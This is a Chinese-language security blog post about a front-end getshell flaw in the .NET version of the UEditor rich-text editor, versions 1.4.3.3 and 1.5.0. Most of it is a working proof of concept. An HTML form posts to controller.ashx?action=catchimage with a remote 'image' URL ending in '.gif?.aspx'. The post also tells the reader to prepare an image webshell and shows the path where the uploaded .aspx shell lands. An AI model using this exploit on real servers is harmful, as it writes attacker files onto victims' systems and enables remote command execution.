UEditor .net 前台getshell

释放双眼,带上耳机,听听看~!

UEditor
是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危
0x01:
版本:1.4.3.3、 1.5.0(只测试这两个版本)
0x02:

如下图所示,只要出现如下结果,即有可能漏洞存在

0x03
POC:

<form action="https://x.x.x.x/Content/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">

  <p>shell address:<input type="text" name="source[]" value="http://x.x.x.x/Content/x.gif?.aspx"/></p >

  <input type="submit" value="Submit" />

</form>

0x04:
需准备一个图片马儿,远程shell地址需要指定扩展名为 1.gif?.aspx
0x05:
shell地址如下:
http://x.x.x.x.x/Content/ueditor/net//upload/image/20180823/6367065672506096633557644.aspx

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

给TA打赏
共{{data.count}}人
人已打赏
Web安全渗透测试社会工程学

Google Hacking

2018-8-22 9:08:47

Web安全渗透测试

cmd渗透命令集合

2018-8-24 9:31:19

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
今日签到
有新私信 私信列表
搜索